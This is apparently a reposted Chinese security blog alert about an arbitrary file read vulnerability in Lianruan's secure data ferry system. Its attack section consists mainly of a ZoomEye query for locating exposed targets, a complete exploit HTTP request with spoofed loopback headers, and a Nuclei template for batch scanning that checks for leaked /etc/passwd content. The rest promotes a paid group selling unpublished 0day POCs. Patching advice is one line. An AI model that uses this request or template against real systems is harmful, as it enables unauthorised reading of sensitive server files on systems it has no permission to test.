联软安全数据摆渡系统任意文件读取漏洞|漏洞预警

admin 2024年5月14日20:16:12评论120 views字数 2869阅读9分33秒阅读模式

0x01 产品简介

        联软安全数据摆渡系统是联软科技发明的,融合网络隔离、网盘和DLP技术于一体的专业产品,它同时支持多网交换,查杀毒、审计审批、文档追踪和水印功能,是解决用户网络隔离、网间及网内数据传输、交换、共享/分享、存储的理想安全设备,具有开创性意义这里我推荐利用 ZoomEye搜索引擎直接输入关键字即可

联软安全数据摆渡系统任意文件读取漏洞|漏洞预警

声明

请自行搭建环境进行漏洞测试,该公众号或作者星球分享的工具、项目、漏洞仅供安全研究与学习之用请勿用于非法行为,如用于其他用途,由使用者承担全部法律及连带责任,与作者和本公众号无关。

TIPS: 末尾领取资料及福利-批量检测脚本在末尾

0x02 漏洞描述

任意文件读取漏洞(Arbitrary File Read Vulnerability)是一种常见的安全漏洞,它允许攻击者读取服务器上的任意文件,包括敏感配置文件、密码文件、源代码等。这种漏洞通常发生在应用程序没有正确限制用户对文件系统的访问权限时。

0x03 ZoomEye语法

app:"联软安全数据交换系统"

联软安全数据摆渡系统任意文件读取漏洞|漏洞预警

0x04 漏洞复现

Request

GET /UniExServices/poserver.zz?pgop=opendiskdoc&id=KmcgY3MtK3IpLSRfOXE9YmpkL2orbBdrKztnJCltInIrbDhyP24rOzhjPHI= HTTP/1.1Cache-Control: max-age=0Sec-Ch-Ua: "Not A(Brand";v="99", "Google Chrome";v="121", "Chromium";v="121"Sec-Ch-Ua-Mobile: ?0Sec-Ch-Ua-Platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: zh-CN,zh;q=0.9X-Forwarded-For: 127.0.0.1X-Originating-Ip: 127.0.0.1X-Remote-Ip: 127.0.0.1X-Remote-Addr: 127.0.0.1Connection: close

联软安全数据摆渡系统任意文件读取漏洞|漏洞预警

Nuclei批量检测POC(请自行搭建环境检测)
id: lianruan-UniExServices-readfileinfo:  name: lianruan-UniExServices-readfile  author: HackTwo  severity: high  description: |    漏洞测试-readfile  reference:    - https://wx.zsxq.com/dweb2/index/group/88885811181452  tags: autohttp:  - raw:      - |        GET /UniExServices/poserver.zz?pgop=opendiskdoc&id=KmcgY3MtK3IpLSRfOXE9YmpkL2orbBdrKztnJCltInIrbDhyP24rOzhjPHI= HTTP/1.1        Host: {{Hostname}}        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2        Connection: close    matchers:      - type: dsl        dsl:          - status_code==200 && contains_all(body,"root:")

联软安全数据摆渡系统任意文件读取漏洞|漏洞预警

0x05 修复建议

官方已经推出新版本,建议升级到最新版

0x06 内部VIP星球介绍-V1.3

需要加入内部知识星球可点击下方链接,资源包含但不限于网上未公开的1day/0day漏洞(2024 更新漏洞POC共1000+)2024最新SRC/CNVD/Edu实战挖掘技巧报告,红队内网横向渗透,代码审计,JS逆向,SRC培训等课程。圈子对新人友好,加入圈子拥有FOFA shadan 360Quake ZoomEye Tide 零零信安 Hunter等等高级会员账号,SRC文档,武器库。圈子里面资料价值至少在10K以上,目前星球内部主题700+,资源2000+,其他和网盘资源10w+并持续更新中,越早加入价格越低

👉点击了解--->>>>内部VIP知识星球福利介绍V1.3版本-星球介绍👈

近期更新的0day/1day(包含公开和未公开漏洞-仅列举部分)漏洞整理已更新至1000+需要的加入星球获取

联软安全数据摆渡系统任意文件读取漏洞|漏洞预警

联软安全数据摆渡系统任意文件读取漏洞|漏洞预警

一些漏洞报告200+(仅列举部分)加入星球获取更多资源及视频资源持续更新中!

联软安全数据摆渡系统任意文件读取漏洞|漏洞预警

联软安全数据摆渡系统任意文件读取漏洞|漏洞预警

结尾

免责声明

获取方法

回复“app" 获取  app渗透和app抓包教程

回复“渗透字典" 获取 针对一些字典重新划分处理,收集了几个密码管理字典生成器用来扩展更多字典的仓库。

回复“书籍" 获取 网络安全相关经典书籍电子版pdf

压缩包解压密码:HackTwo

免责声明

文章中的案例或工具仅面向合法授权的企业安全建设行为,如您需要测试内容的可用性,请自行搭建靶机环境,勿用于非法行为。如用于其他用途,由使用者承担全部法律及连带责任,与作者和本公众号无关。本项目所有收录的poc均为漏洞的理论判断,不存在漏洞利用过程,不会对目标发起真实攻击和漏洞利用。文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用。如您在使用本工具或阅读文章的过程中存在任何非法行为,您需自行承担相应后果,我们将不承担任何法律及连带责任。本工具或文章或来源于网络,若有侵权请联系作者删除,请在24小时内删除,请勿用于商业行为,自行查验是否具有后门,切勿相信软件内的广告!

原文始发于微信公众号(渗透安全HackTwo):联软安全数据摆渡系统任意文件读取漏洞|漏洞预警

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年5月14日20:16:12
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   联软安全数据摆渡系统任意文件读取漏洞|漏洞预警https://cn-sec.com/archives/2738562.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息